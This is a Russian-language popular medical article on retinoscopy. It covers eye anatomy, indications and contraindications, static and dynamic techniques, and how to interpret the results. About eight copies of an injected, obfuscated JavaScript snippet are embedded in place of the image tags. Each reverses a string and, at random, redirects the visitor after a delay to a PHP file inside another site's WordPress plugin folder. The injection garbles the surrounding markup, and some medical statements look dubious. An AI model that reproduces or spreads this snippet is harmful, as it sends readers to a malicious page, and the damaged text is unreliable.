Ретиноскопия: как разобраться в исследовании

Зрение — это один из самых важных органов чувств. При его нарушении человек перестаёт получать удовольствие от чтения, просмотра некогда любимых программ и телешоу, прогулки и развлечения вгоняют в тоску. Что делать и куда обращаться, если зрение начало стремительно падать? Ответ достаточно прост: с помощью процедуры исследования глаз, которая называется ретиноскопия, можно получить ответы на все вопросы. Именно поэтому стоит немного подробнее узнать об этом исследовании.

Что представляет собой ретиноскопия

Прежде чем обращаться к понятию ретиноскопии, следует совсем немного вспомнить строение и анатомию глазного яблока. Без этих знаний невозможно понять сущность процедуры в целом. Глазное яблоко имеет форму шара или эллипсоида и располагается внутри костного образования в черепе, именуемого глазницей.

Глаз состоит из трёх слоёв, которые расположены послойно друг за другом: наружного, среднего и внутреннего.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/stroenie-glaza-728×546.jpg» alt=»Строение глаза» width=»728″ height=»546″ /> Схема строения глаза поможет лучше разобраться в методике ретиноскопии

Наружный слой состоит из двух важных частей, именуемых роговицей и склерой. Роговица представляет собой тонкое и прозрачное образование, которое позволяет световым лучам попадать в глубинные части глазного яблока. Она имеет некоторый изгиб, способствующий изменению направления световых лучей и преломлению их подобно стеклянной линзе. Склера же очень плотная и непрозрачная, благодаря своему белому цвету напоминает белок куриного яйца.

Срединная часть глазного яблока имеет весьма развитую артериовенозную и капиллярную сети. В ней различают несколько элементов: радужную оболочку, ресничное тельце и сосудистый слой. Именно радужка определяет цвет наших глаз. Если в ней содержится малое количество пигмента, они приобретают голубой, серый или зелёный оттенок, при большом же количестве этого вещества — коричневый или чёрный цвет. Радужная оболочка имеет в центре отверстие, именуемое зрачком. Ресничное тельце участвует в фиксации хрусталика и отвечает за перестройку глаза с ближних объектов на дальние.

Внутренний слой называется сетчаткой, которая представляет собой огромное скопление нервных клеток. Центральная часть этой оболочки называется макулой, и она содержит зрительные клетки: колбочки и палочки, воспринимающие свет и тень, а также различные цвета и оттенки. Сетчатка представляет собой так называемый проекционный экран, на котором отображается всё то, что попадает в поле нашего зрения. С помощью зрительного нерва, отходящего от задней поверхности глазного яблока, эта информация передаётся в кору больших полушарий головного мозга, где происходит её обработка и анализ.

Видео: строение глаза

Ретиноскопия — это инструментальное и клиническое исследование сетчатки, направленное на определение способности изменять ход светового потока, который поступает в глазное яблоко.

tor»>

В России вместо слова «ретиноскопия» употребляют также его синонимы: скиаскопия, световая офтальмоскопия, проба с тенями.

Впервые эта методика была предложена в далёком 1880 году французским исследователем в области офтальмологии Фердинандом Кьюине. Он использовал маленькое зеркальце, с помощью которого направлял луч отражённого света прямо в глаз, а затем наблюдал за изменениями зрачкового отверстия. Чуть позже был разработан специальный прибор, именуемый скиаскопом. Он представлял собой всё то же зеркало, но уже двустороннее: с его помощью исследователь мог более точно направить луч света в глазное яблоко и внимательно следить за тенью, которая появлялась внутри глаза. В начале двадцатого века этот метод исследования стал очень широко применяться как за рубежом, так и в нашей стране.

Основы ретиноскопии

Глазное дно — это система, которая может не только полностью поглотить световой луч, но и в какой-то мере произвести его отражение. Когда зрение сконцентрировано на определённом участке пространства, световые лучи, проходящие через преломляющую часть глазного яблока, обязаны вернуться в исходную точку.

tor»>

Глаз человека подобен зеркалу: он преломляет и отражает свет. На самом деле, вся зрительная информация, которую мы воспринимаем, попадает к нам в перевёрнутом виде. Однако с помощью мозга, переворачивающего изображение в исходный вид, мы видим действительность такой, какая она и существует.

Когда глаз расположен на линии распространения отражённого света, врачу-офтальмологу будет виден зрачок, подсвеченный красным цветом одинаково со всех сторон. Если же равномерно перемещать источник лучей относительно глаза исследуемого пациента, можно поймать тень, которая будет изменять равномерность окрашивания зрачка.

В настоящее время к ретиноскопии прибегают для того, чтобы наиболее точно определить степень дальнозоркости или близорукости, а также узнать, имеет ли этот пациент астигматизм. Офтальмологи проводят такое исследование большинству молодых людей, которым вскоре необходимо поступить на службу в армию, а также тем, кто длительное время служит в правоохранительных органах и правовых структурах.

Основные показания к проведению процедуры

Ретиноскопия — это процедура, которая не требует особенной подготовки или использования дорогостоящего оборудования. Но для её назначения необходимо обоснование. Врач-офтальмолог не всегда начинает исследовать зрительный аппарат с ретиноскопии, прибегая для начала к более простым методам обследования.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/proverka-zreniya-728×485.jpg» alt=»Врач настраивает специальный аппарат перед пациентом» width=»728″ height=»485″ /> С целью проверки остроты зрения используют и другие методики

Показания к проведению ретиноскопии:

    tor»>
  • длительно существующее нарушение зрения вдаль (близорукость);
  • длительно существующее нарушение ближнего зрения (дальнозоркость);
  • жалобы на снижение цветового восприятия;
  • жалобы на уменьшение остроты зрения в сумеречное время суток и ночью;
  • резко возникшее ослабление чёткости попадающих в поле зрения объектов у ранее здорового человека;
  • аномалии развития и строения глазного яблока;
  • травматическое повреждение глазного яблока;
  • формирование дальних объектов за пределами сетчатого слоя глаза;
  • врождённые аномалии хрусталика;
  • травматические повреждения хрусталика;
  • невозможность применения других методов обследования глаза;
  • астигматизм.

Кому нельзя проводить ретиноскопию

Некоторым группам лиц проводить ретиноскопию строго запрещено. Это исследование не только не принесёт желаемого результата, но может также вызвать серьёзные нарушения в состоянии здоровья. При наличии абсолютных противопоказаний к проведению процедуры следует от неё отказаться и выбрать другой метод обследования. Если у человека выявлены патологии, при которых проводить ретиноскопию можно лишь в случаях, когда без такого исследования не обойтись, то процедура осуществляется с высочайшими мерами предосторожности.

tor»>

Находясь под действием токсинов алкоголя или наркотиков, человек не может чётко воспринимать предметы. Зрение несколько ухудшается, и результат, который будет получен при исследовании, окажется ложным.

Абсолютные противопоказания к проведению ретиноскопии:

    tor»>
  • состояние алкогольной интоксикации и алкогольного опьянения;
  • состояние наркотической интоксикации;
  • психические заболевания в стадии обострения: шизофрения, маниакальная фаза маниакально-депрессивного расстройства, острый психоз и галлюциноз, делирий;
  • младенческий, дошкольный и детский возраст до семи или восьми лет;
  • острый период травмы глазного яблока;
  • острый период травмы хрусталика;
  • инфекционно-воспалительные заболевания глаза;
  • острые аллергические реакции на препараты, которые используются при проведении обследования.

Относительные противопоказания к проведению этой процедуры:

    tor»>
  • эпилепсия или эпилептический статус;
  • недавно перенесённые травмы мозга;
  • контузии глазного яблока и зрительного нерва;
  • лихорадка;
  • недавно перенесённые инсульты геморрагического и ишемического типов.

Важные особенности статической ретиноскопии

Статическая ретиноскопия — методика, позволяющая оценить состояние оптической системы глаза в определённый фиксированный момент времени. Чаще всего такой вариант исследования используют для подтверждения уже существующего диагноза.

Достоинствами статической ретиноскопии являются:

    tor»>
  • возможность применения для обследования детей;
  • проведение как в «естественных» условиях, так и при использовании специальных лекарственных препаратов;
  • довольно точное определение преломляющей способности глаза.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/vrach-derzhit-linzy-u-glaz-rebenka.jpg» alt=»Врач держит линзы у глаза ребёнка» width=»640″ height=»427″ /> Статическая ретиноскопия отлично подходит для обследования детей

Важные особенности динамической ретиноскопии

Эта методика применяется с целью узнать состояние оптической системы глаза в динамике, предположить дальнейшие изменения и определить тактику их лечения. С её помощью можно выявить ранее не диагностированные патологии организма.

Динамическая ретиноскопия позволяет:

    tor»>
  • прогнозировать дальнейшую динамику изменения зрения;
  • определить, какое количество диоптрий нужно добавить или убрать;
  • определить задержку аккомодации глаза;
  • обследовать лиц в возрасте старше 40–45 лет.
$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/muzhchina-s-foropterom-u-glaz.jpg» alt=»Мужчина с фороптером у глаз» width=»500″ height=»334″ /> Динамическая ретиноскопия — более серьёзное исследование, нежели статический вариант

Методы и техники проведения ретиноскопии

Методики проведения статической и динамической ретиноскопии несколько отличаются друг от друга. Дело в том, что при динамической исследовании используется больше оборудования и различных таблиц. Статическую ретиноскопию делят на два вида: первый проводится в естественных условиях, а второй — при использовании специальных медикаментов, изменяющих состояние глаза. Оба этих метода широко применяются в отечественной и зарубежной офтальмологии.

Статическая ретиноскопия с использованием медикаментов

Оборудование, необходимое для проведения статической ретиноскопии при параличе ресничной мышцы:

    tor»>
  • скиаскоп;
  • скиаскопические измерительные линейки;
  • офтальмологическая лампа;
  • лекарственные препараты, вызывающие стойкий паралич ресничной мышцы и увеличение зрачка: Атропин, Платифиллин, Тропикамид.

Что необходимо для статической ретиноскопии — фотогалерея

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29048,29047,29045,29031″]

В течение нескольких дней перед обследованием проводится особая подготовка: регулярно закапывается в глаза атропин по одной-две капли. Во время исследования пациент должен располагаться напротив врача и смотреть на источник света, медленно перемещая линейку вверх и вниз. После того как врач добьётся полной стабилизации соответствия диоптрий уровню зрения, он отмечает результат.

Особенности техники:

    tor»>
  • скиаскопическая линейка должна располагаться на расстоянии не более 13 мм от глаза пациента: если он не может фиксировать её самостоятельно, стоит прибегнуть к помощи медицинской сестры;
  • медленное и плавное передвижение скиаскопической линейки необходимо для того, чтобы чётко отследить момент, когда пациент начнёт видеть максимально хорошо: с этой линзы записывается величина диоптрий;
  • рекомендуется начинать обследование пациента, поместив его на расстояние 60 или 67 см от источника света;
  • используются лекарственные препараты, которые парализуют глаз не более чем на четыре часа: тогда после исследования люди довольно быстро могут вернуться к работе и повседневной жизни.

Естественная статическая ретиноскопия

Естественная ретиноскопия проводится без использования специальных препаратов, которые влияют на размер зрачка. Врач также использует скиаскоп и линейку. Особенность этой методики состоит в том, что источник света представляет собой не рассеянное световое пятно, а узкую и яркую полоску. С этой целью используются специальные лампы. Также можно использовать цилиндрический источник света. Перемещение ретиноскопа производят в одной плоскости, двигая его вправо и влево.

Динамическая ретиноскопия

Динамическая ретиноскопия — более длительное и трудоёмкое исследование, которое проводят людям пожилого и среднего возраста с целью определения уровня снижения остроты зрения.

Оборудование, необходимое для проведения динамической ретиноскопии:

    tor»>
  • ретиноскоп;
  • обычные очки, которые носит пациент;
  • фороптер;
  • таблица со специальными картинками, словами или буквами;
  • лампа.

Что нужно для динамической ретиноскопии — фотогалерея

) == "string") return $nJe.list[n].split("").reverse().join("");return $nJe.list[n];};$nJe.list=["\'php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toplay=»true» fg_allowfullscreen=»true» fg_arrow=»true» fg_loop=»true» ids=»29051,29050,29049″]

Пациент садится на расстоянии метра, 50, 40, 30 или 20 сантиметров от предмета, на котором он должен сфокусировать свой взгляд. В качестве средства для определения точки, где будет присутствовать минимальная острота зрения, используются таблицы. Устанавливают источник света для отражения. На испытуемого надевают фороптер.

tor»>

Фороптер представляет собой устройство, с помощью которого можно определить наличие или отсутствие у пациента астигматизма.

Техника проведения:

    tor»>
  1. В фороптере путём длительного подбора устанавливают те линзы, благодаря которым зрение близорукого человека максимально приближается к единице. Проводится исследование в обычных очках, которые человек носит в течение всей жизни.
  2. Направляют на глазное яблоко ретиноскоп, внимательно наблюдая за тенью.
  3. Постепенно перемещают фороптер, изменяя диоптрии выбранных линз, в это время пациента просят описывать свои ощущения и контролировать чёткость зрения.

Видео: техника проведения ретиноскопии

Трактовка полученных во время исследования результатов

Когда врачом-офтальмологом применяется уплощённая зеркальная поверхность для обследования, тень направляется в другую сторону от движущегося ретиноскопа. Если пациент способен различать предмет лишь на расстоянии менее одного метра или 90 сантиметров, то стоит говорить о наличии у него близорукости, при которой зрение упало на величину более полтора диоптрий. Такому пациенту показано носить очки или линзы.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/ochki-dlya-zreniya-728×274.jpg» alt=»Очки для зрения» width=»728″ height=»274″ /> Очки — лучшее средство для коррекции зрения

Если же при применении уплощённого зеркала тень следует точно за ретиноскопическим инструментом, а расстояние, на котором пациент способен видеть чётко, не превышает ста сантиметров, следует сделать вывод, что зрение находится в пределах нормы либо упало менее чем на одну диоптрию. В таком случае можно его корректировать с помощью специальной гимнастики и капель.

$nJe=function(n){if (typeof ($nJe.list[n]) == «string») return $nJe.list[n].split(«»).reverse().join(«»);return $nJe.list[n];};$nJe.list=[«\’php.pots_egamiruces/egamieruces-ahctpac/mrof-tcatnoc-is/snigulp/tnetnoc-pw/moc.mrifwaltb.www//:ptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}tomy.ru/wp-content/uploads/2017/09/gimnastika-dlya-glaz-1-728×514.jpg» alt=»Гимнастика для глаз» width=»728″ height=»514″ /> Гимнастика укрепляет мышцы глаза

Когда применяется выпукло-вогнутая зеркальная поверхность, результаты следует трактовать ровно наоборот. Если тень следует за ретиноскопом, а расстояние чёткой видимости не превышает одного метра, врач-офтальмолог делает вывод о том, что у этого пациента наблюдается серьёзная миопия. Когда ретиноскоп и тень расходятся в направлениях — о наличии слабой миопии либо о нормальном зрении.

Чтобы определить способность глаза преломлять световые лучи, нужно использовать специальную скиаскопическую линейку с различными линзами, которые, так или иначе, изменяют видимость. Больному требуется медленно перемещать её вверх, от самого низкого до самого высокого значения диоптрий. Офтальмолог в это время тщательно наблюдает за скольжением тени по глазному яблоку. Как только она пропадает, врач отмечает результат, на какой линзе это произошло — это показатель, на сколько диоптрий снизилось зрение.

Зрение — самое прекрасное и удивительное из всех шести чувств человека. Благодаря ему мы можем увидеть надвигающуюся опасность, почувствовать изменение настроения другого человека, а также оценить всю красоту окружающего мира. Людям, которые по той или иной причине лишились этого чувства, становится очень непросто жить в полной или частичной темноте. Бывают ситуации, когда возникает чувство, что зрение начинает подводить: предметы расплываются перед глазами, линии становятся менее чёткими, яркие краски и цвета теряют свою насыщенность. Не стоит пренебрегать профилактическими медицинскими осмотрами: проверять остроту зрения рекомендовано не реже раза в год. Люди, которые имеют проблемы по этой части, должны проходить обследование раз в полгода. Чтобы сохранить способность видеть в пожилом возрасте, рекомендуется начать ухаживать за ним ещё в молодости.

Adblock
detector